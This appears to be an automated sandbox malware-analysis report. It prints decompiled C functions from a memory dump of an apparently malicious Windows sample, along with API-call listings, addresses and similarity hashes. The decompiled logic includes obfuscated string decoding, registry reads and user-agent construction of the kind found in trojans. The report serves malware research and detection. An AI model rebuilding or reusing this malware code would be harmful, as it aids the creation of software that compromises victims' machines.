			E02F662CD(void* __eax, void* _a4, char* _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				char* _t49;
				char* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 =  &(_t49[_t5]);
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 = StrStrA(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t33 = RtlAllocateHeap( *0x2f6d238, 0, _a16 + _t55); // executed
						_t44 = _t33;
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}

0x02f662d5
0x02f662d8
0x02f662da
0x02f662e3
0x02f662f5
0x02f662f5
0x02f662f9
0x02f662fb
0x02f662fe
0x02f66301
0x02f6630a
0x02f66314
0x02f66318
0x02f6631d
0x02f6632d
0x02f66333
0x02f66337
0x02f66388
0x02f66339
0x02f66339
0x02f66341
0x02f66350
0x02f66355
0x02f66365
0x02f6636b
0x02f66376
0x02f66380
0x02f66384
0x02f66384
0x02f66337
0x02f6638f
0x02f66396

APIs

lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 02F66301
StrStrA.SHLWAPI(00000000,?), ref: 02F6630E
RtlAllocateHeap.NTDLL(00000000,?), ref: 02F6632D
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 02F66341
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 02F66350
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 02F6636B

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 571b0ccd8ebf1020a83924c28fbbdc42555ed26533836a149270d9fc766aaab6
Instruction ID: ea93f3afc6fc42e45fa1c011e4bb5b0e65d40653ef973e67cd72da6dc0bf1576
Opcode Fuzzy Hash: 571b0ccd8ebf1020a83924c28fbbdc42555ed26533836a149270d9fc766aaab6
Instruction Fuzzy Hash: 9321AE36A00209AFCB119F68C849AEEBF79EF84784F098159ED54AB304C735E914CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F6A642, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02F6A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				void* _t63;
				intOrPtr _t65;
				char _t68;
				void* _t71;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x2f6d33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E02F6A5E9(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					_t63 = E02F6621D(_t97, _t105, _t96, _t60); // executed
					if(_t63 != 0) {
						L27:
						E02F6147E(_a8);
						goto L29;
					}
					_t65 =  *0x2f6d2a4; // 0xb3a5a8
					_t16 = _t65 + 0x2f6e8de; // 0x65696c43
					_t68 = E02F6A5E9(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d02f6c0, executed
						_t71 = E02F64C9A( *_t33, _t96, _a8,  *0x2f6d334,  *((intOrPtr*)( *_t29 + 0x28))); // executed
						if(_t71 == 0) {
							_t72 =  *0x2f6d2a4; // 0xb3a5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x2f6ea54; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x2f6ea4f; // 0x55434b48
								_t73 = _t34;
							}
							if(E02F630FC( &_a24, _t73,  *0x2f6d334,  *0x2f6d338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x2f6d2a4; // 0xb3a5a8
									_t44 = _t75 + 0x2f6e856; // 0x74666f53
									_t78 = E02F6A5E9(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d02f6c0
										E02F61BC1( *_t47, _t96, _a8,  *0x2f6d338, _a24);
										_t49 = _t105 + 0x10; // 0x3d02f6c0
										E02F61BC1( *_t49, _t96, _t103,  *0x2f6d330, _a16);
										E02F6147E(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d02f6c0
									E02F61BC1( *_t40, _t96, _a8,  *0x2f6d338, _a24);
									_t43 = _t105 + 0x10; // 0x3d02f6c0, executed
									E02F61BC1( *_t43, _t96, _a8,  *0x2f6d330, _a16); // executed
								}
								if( *_t105 != 0) {
									E02F6147E(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d02f6c0
					if(E02F674B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d02f6c0
							E02F64C9A( *_t26, _t96, _a8, _a24, _t104);
						}
						E02F6147E(_t104);
						_t102 = _a16;
					}
					E02F6147E(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x2f6d33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

0x02f6a642
0x02f6a64b
0x02f6a652
0x02f6a657
0x02f6a6c6
0x02f6a6cc
0x02f6a6d1
0x02f6a6da
0x02f6a6df
0x02f6a6e4
0x02f6a858
0x02f6a85f
0x02f6a85f
0x02f6a864
0x02f6a866
0x02f6a866
0x02f6a86f
0x02f6a86f
0x02f6a6ea
0x02f6a6ef
0x02f6a6f6
0x02f6a84e
0x02f6a851
0x00000000
0x02f6a851
0x02f6a6fc
0x02f6a701
0x02f6a70a
0x02f6a70f
0x02f6a714
0x02f6a75e
0x02f6a75e
0x02f6a771
0x02f6a774
0x02f6a77b
0x02f6a781
0x02f6a788
0x02f6a792
0x02f6a792
0x02f6a78a
0x02f6a78a
0x02f6a78a
0x02f6a78a
0x02f6a7b4
0x02f6a7bc
0x02f6a7ea
0x02f6a7ef
0x02f6a7f8
0x02f6a7fd
0x02f6a801
0x02f6a833
0x02f6a803
0x02f6a810
0x02f6a813
0x02f6a823
0x02f6a826
0x02f6a82c
0x02f6a82c
0x02f6a7be
0x02f6a7cb
0x02f6a7ce
0x02f6a7e0
0x02f6a7e3
0x02f6a7e3
0x02f6a83d
0x02f6a849
0x02f6a83f
0x02f6a842
0x02f6a842
0x02f6a83d
0x02f6a7b4
0x00000000
0x02f6a77b
0x02f6a723
0x02f6a72d
0x02f6a72f
0x02f6a734
0x02f6a738
0x02f6a73a
0x02f6a745
0x02f6a748
0x02f6a748
0x02f6a74e
0x02f6a753
0x02f6a753
0x02f6a759
0x00000000
0x02f6a759
0x02f6a65c
0x00000000
0x02f6a683
0x02f6a68e
0x02f6a6a4
0x02f6a6aa
0x02f6a6b2
0x00000000
0x02f6a6b2

APIs

StrChrA.SHLWAPI(02F6553C,0000005F,00000000,00000000,00000104), ref: 02F6A675
memcpy.NTDLL(?,02F6553C,?), ref: 02F6A68E
lstrcpy.KERNEL32(?), ref: 02F6A6A4

Part of subcall function 02F6A5E9: lstrlen.KERNEL32(?,00000000,02F6D330,00000001,02F6937A,02F6D00C,02F6D00C,00000000,00000005,00000000,00000000,?,?,?,02F6207E,?), ref: 02F6A5F2
Part of subcall function 02F6A5E9: mbstowcs.NTDLL ref: 02F6A619
Part of subcall function 02F6A5E9: memset.NTDLL ref: 02F6A62B

Part of subcall function 02F61BC1: lstrlenW.KERNEL32(02F6553C,?,?,02F6A818,3D02F6C0,80000002,02F6553C,02F69642,74666F53,4D4C4B48,02F69642,?,3D02F6C0,80000002,02F6553C,?), ref: 02F61BE1

Part of subcall function 02F6147E: RtlFreeHeap.NTDLL(00000000,00000000,02F61D11,00000000,?,?,-00000008), ref: 02F6148A

lstrcpy.KERNEL32(?,00000000), ref: 02F6A6C6

Strings

\, xrefs: 02F6A6AA

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: 9b7f5260d7d19fd0aa01c31c182eafebd90038dd6a009f29d4983b7158629021
Instruction ID: be54e2c46257db3fdbeda751aa54abb42f9f6c67a1a4cc12858e666c25a69798
Opcode Fuzzy Hash: 9b7f5260d7d19fd0aa01c31c182eafebd90038dd6a009f29d4983b7158629021
Instruction Fuzzy Hash: 1E513C72A0020EEFDF11AFA0DD4DEAA77BAEF04384F044515FA19A6120E735D925DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F64908, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E02F64908(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02F611AF();
				if(_t21 != 0) {
					_t59 =  *0x2f6d25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2f6d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2f6d164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02F61111( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2f6d2a4; // 0xb3a5a8
					if( *0x2f6d25c > 5) {
						_t8 = _t26 + 0x2f6e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2f6ea05; // 0x44283a44
						_t27 = _t7;
					}
					E02F61EC4(_t27, _t27);
					_t31 = E02F61A4E(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x2f6d270 =  *0x2f6d270 ^ 0x81bbe65d;
						_t32 = E02F658BE(0x60);
						 *0x2f6d324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2f6d324; // 0x3aa95b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2f6d324; // 0x3aa95b0
							 *_t51 = 0x2f6e845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2f6d238, 0, 0x43);
							 *0x2f6d2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2f6d25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2f6d2a4; // 0xb3a5a8
								_t13 = _t58 + 0x2f6e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2f6c28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02F693D5( ~_v8 &  *0x2f6d270, 0x2f6d00c); // executed
								_t42 = E02F698F7(0, _t55, _t63, 0x2f6d00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02F6205B(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02F69B6F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E02F66CD3(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2f6d160(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E02F67827(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x02f64908
0x02f64912
0x02f64915
0x02f64918
0x02f6491b
0x02f64922
0x02f64924
0x02f64930
0x02f64932
0x02f64932
0x02f6493b
0x02f64941
0x02f64946
0x02f64960
0x02f6496c
0x02f6496e
0x02f64973
0x02f6497d
0x02f6497d
0x02f64975
0x02f64975
0x02f64975
0x02f64975
0x02f64984
0x02f64991
0x02f64998
0x02f6499d
0x02f6499d
0x02f649a6
0x02f649a9
0x02f649cf
0x02f649db
0x02f649e0
0x02f649e5
0x02f649e7
0x02f64a13
0x02f64a15
0x02f649e9
0x02f649ed
0x02f649f2
0x02f649f7
0x02f649fe
0x02f64a04
0x02f64a09
0x02f64a0f
0x02f64a16
0x02f64a18
0x02f64a1a
0x02f64a29
0x02f64a2f
0x02f64a34
0x02f64a36
0x02f64a66
0x02f64a68
0x02f64a38
0x02f64a38
0x02f64a3e
0x02f64a4b
0x02f64a51
0x02f64a51
0x02f64a59
0x02f64a62
0x02f64a69
0x02f64a6b
0x02f64a6d
0x02f64a74
0x02f64a81
0x02f64a86
0x02f64a8b
0x02f64a8d
0x02f64a8f
0x00000000
0x00000000
0x02f64a91
0x02f64a96
0x02f64a98
0x02f64a9f
0x02f64aa3
0x02f64aa6
0x02f64abb
0x02f64abf
0x02f64ac4
0x00000000
0x02f64ac4
0x02f64aa8
0x02f64aaa
0x00000000
0x00000000
0x02f64ab0
0x02f64ab5
0x02f64ab7
0x02f64ab9
0x00000000
0x00000000
0x00000000
0x02f64ab9
0x02f64a9c
0x02f64a9c
0x02f64a6d
0x02f649ab
0x02f649ab
0x02f649b0
0x02f64ac6
0x02f64acb
0x02f64ad3
0x02f64ad3
0x00000000
0x02f64acb
0x02f649b6
0x02f649b9
0x02f649c3
0x02f649ca
0x00000000
0x02f64adb
0x02f64adb
0x02f64ade
0x02f64ae2
0x02f64ae2

APIs

Part of subcall function 02F611AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,02F64920,00000001), ref: 02F611BE

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02F6499D

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

memset.NTDLL ref: 02F649ED
RtlInitializeCriticalSection.NTDLL(03AA9570), ref: 02F649FE

Part of subcall function 02F66CD3: memset.NTDLL ref: 02F66CED
Part of subcall function 02F66CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02F66D24
Part of subcall function 02F66CD3: StrCmpNIW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02F64AB5), ref: 02F66D2F

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02F64A29
wsprintfA.USER32 ref: 02F64A59

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 7ff956fa29e93214199f7d6f3aa08fad85c26f98df6ffcabed7a20bd4076ccd7
Instruction ID: 88c8f4d5b4ecce2cdfcbf3df16f1fe7bc44008208db9bb9f6113369e632651ba
Opcode Fuzzy Hash: 7ff956fa29e93214199f7d6f3aa08fad85c26f98df6ffcabed7a20bd4076ccd7
Instruction Fuzzy Hash: 1A518D71F80219ABDB31FFA49C8DB7EB7A9EB08BC4F040915E211E7240E77199149B54

Uniqueness

Uniqueness Score: -1.00%

Function 02F672F2, Relevance: 7.6, APIs: 5, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F672F2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x2f6d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2f6d2a4; // 0xb3a5a8
				_t3 = _t8 + 0x2f6e836; // 0x61636f4c
				_t25 = 0;
				_t30 = E02F66AF7(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2f6d2a8, 1, 0, _t30);
					E02F6147E(_t30);
				}
				_t12 =  *0x2f6d25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E02F61493(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E02F656A2(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E02F67827(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02f672f3
0x02f672fa
0x02f67304
0x02f67308
0x02f6730e
0x02f6731d
0x02f67324
0x02f67328
0x02f6733a
0x02f6733c
0x02f6733c
0x02f67341
0x02f67348
0x02f6739f
0x02f6739f
0x02f673a5
0x02f673a7
0x02f673a7
0x02f673ac
0x02f673b1
0x02f673b5
0x02f673c7
0x02f673c7
0x02f673cb
0x02f673d1
0x02f673d1
0x00000000
0x02f67358
0x02f67358
0x02f6735f
0x00000000
0x00000000
0x02f67366
0x02f6736e
0x02f67372
0x02f67376
0x02f67376
0x02f6737e
0x02f67383
0x02f67387
0x02f6738b
0x02f673e0
0x02f673e6
0x02f673e6
0x02f67399
0x02f6739d
0x02f673d4
0x02f673d6
0x02f673d9
0x02f673d9
0x00000000
0x02f673d6
0x02f6739d
0x00000000
0x02f67387

APIs

Part of subcall function 02F66AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,02F62098,74666F53,00000000,?,02F6D00C,?,?), ref: 02F66B2D
Part of subcall function 02F66AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 02F66B51
Part of subcall function 02F66AF7: lstrcat.KERNEL32(00000000,00000000), ref: 02F66B59

CreateEventA.KERNEL32(02F6D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02F6555B,?,?,?), ref: 02F67333

Part of subcall function 02F6147E: RtlFreeHeap.NTDLL(00000000,00000000,02F61D11,00000000,?,?,-00000008), ref: 02F6148A

StrChrW.SHLWAPI(02F6555B,00000020,61636F4C,00000001,00000000,?,?,00000000,?,02F6555B,?,?,?), ref: 02F67366
WaitForSingleObject.KERNEL32(00000000,00004E20,02F6555B,00000000,00000000,?,00000000,?,02F6555B,?,?,?), ref: 02F67393
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02F6555B,?,?,?), ref: 02F673C1
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02F6555B,?,?,?), ref: 02F673D9

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 43ebd35ec05fa69d66b5aa1b48e66475a364c0c040c2e9a182eb19dd131ca848
Instruction ID: 999b5ee8b69579592ff27c661b74c2ffd169be53ce785b46fb799b7cac6499a5
Opcode Fuzzy Hash: 43ebd35ec05fa69d66b5aa1b48e66475a364c0c040c2e9a182eb19dd131ca848
Instruction Fuzzy Hash: 5A21C332E802569BD7317AA95C8DB7BF399EB88BDCB090625FF65D7144DB60C8018B50

Uniqueness

Uniqueness Score: -1.00%

Function 02F66CD3, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E02F66CD3(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x2f6d2a4; // 0xb3a5a8
				_t5 = _t40 + 0x2f6ee24; // 0x410025
				_t90 = E02F64814(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E02F6147E(_v88);
					goto L24;
				}
				if(E02F69138(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E02F6A5E9(0,  *0x2f6d33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0x2f6d2a4; // 0xb3a5a8
					_t11 = _t52 + 0x2f6e81a; // 0x65696c43
					_t55 = E02F6A5E9(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
						_t81 = E02F674B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E02F6147E(_t93);
					}
					if(_t81 != 0) {
						L17:
						E02F6147E(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E02F6568A(_t92);
						}
						goto L22;
					} else {
						if(( *0x2f6d260 & 0x00000001) == 0) {
							L14:
							E02F66E92(_t81, _v60, _v56,  *0x2f6d270, 0);
							_t81 = E02F66737(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E02F672F2( &_v84, 0);
							}
							E02F6147E(_v60);
							goto L17;
						}
						_t67 =  *0x2f6d2a4; // 0xb3a5a8
						_t18 = _t67 + 0x2f6e823; // 0x65696c43
						_t70 = E02F6A5E9(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E02F674B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E02F6147E(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x02f66ce9
0x02f66ced
0x02f66cf4
0x02f66cfc
0x02f66cfd
0x02f66cfe
0x02f66cff
0x02f66d00
0x02f66d01
0x02f66d09
0x02f66d15
0x02f66d17
0x02f66d1d
0x02f66e86
0x02f66e87
0x02f66e8f
0x02f66e8f
0x02f66d2f
0x02f66d37
0x02f66e78
0x02f66e79
0x02f66e7d
0x00000000
0x02f66e7d
0x02f66d4a
0x02f66d4c
0x02f66d4c
0x02f66d58
0x02f66d5d
0x02f66d63
0x02f66e66
0x00000000
0x02f66d69
0x02f66d69
0x02f66d6e
0x02f66d77
0x02f66d7c
0x02f66d85
0x02f66dac
0x02f66d87
0x02f66da1
0x02f66da3
0x02f66da3
0x02f66daf
0x02f66e59
0x02f66e5d
0x02f66e67
0x02f66e67
0x02f66e6d
0x02f66e6f
0x02f66e6f
0x00000000
0x02f66db5
0x02f66dbc
0x02f66e01
0x02f66e14
0x02f66e2d
0x02f66e31
0x02f66e37
0x02f66e3f
0x02f66e4e
0x02f66e4e
0x02f66e54
0x00000000
0x02f66e54
0x02f66dbe
0x02f66dc3
0x02f66dcc
0x02f66dd1
0x02f66dd5
0x02f66dfc
0x02f66dd7
0x02f66de7
0x02f66df1
0x02f66df3
0x02f66df3
0x02f66dff
0x00000000
0x00000000
0x00000000
0x00000000
0x02f66dff
0x02f66daf

APIs

memset.NTDLL ref: 02F66CED

Part of subcall function 02F64814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,02F66D15,00410025,00000005,?,00000000), ref: 02F64825
Part of subcall function 02F64814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 02F64842

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02F66D24
StrCmpNIW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02F64AB5), ref: 02F66D2F

Strings

Clie, xrefs: 02F66DE7

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID: Clie
API String ID: 3817122888-1624203186
Opcode ID: c03af057d8efe0936d75edd63b64e87ce47318398e21580377fb13077b763565
Instruction ID: 0d70df7abae89cc99ada619b536e04563f2289e36d984ec2da59f77217726b27
Opcode Fuzzy Hash: c03af057d8efe0936d75edd63b64e87ce47318398e21580377fb13077b763565
Instruction Fuzzy Hash: 4F416C72A08355AFC710ABA1DD8CEBBB7EDEF48784F00492AFA94D7110D675D9048B92

Uniqueness

Uniqueness Score: -1.00%

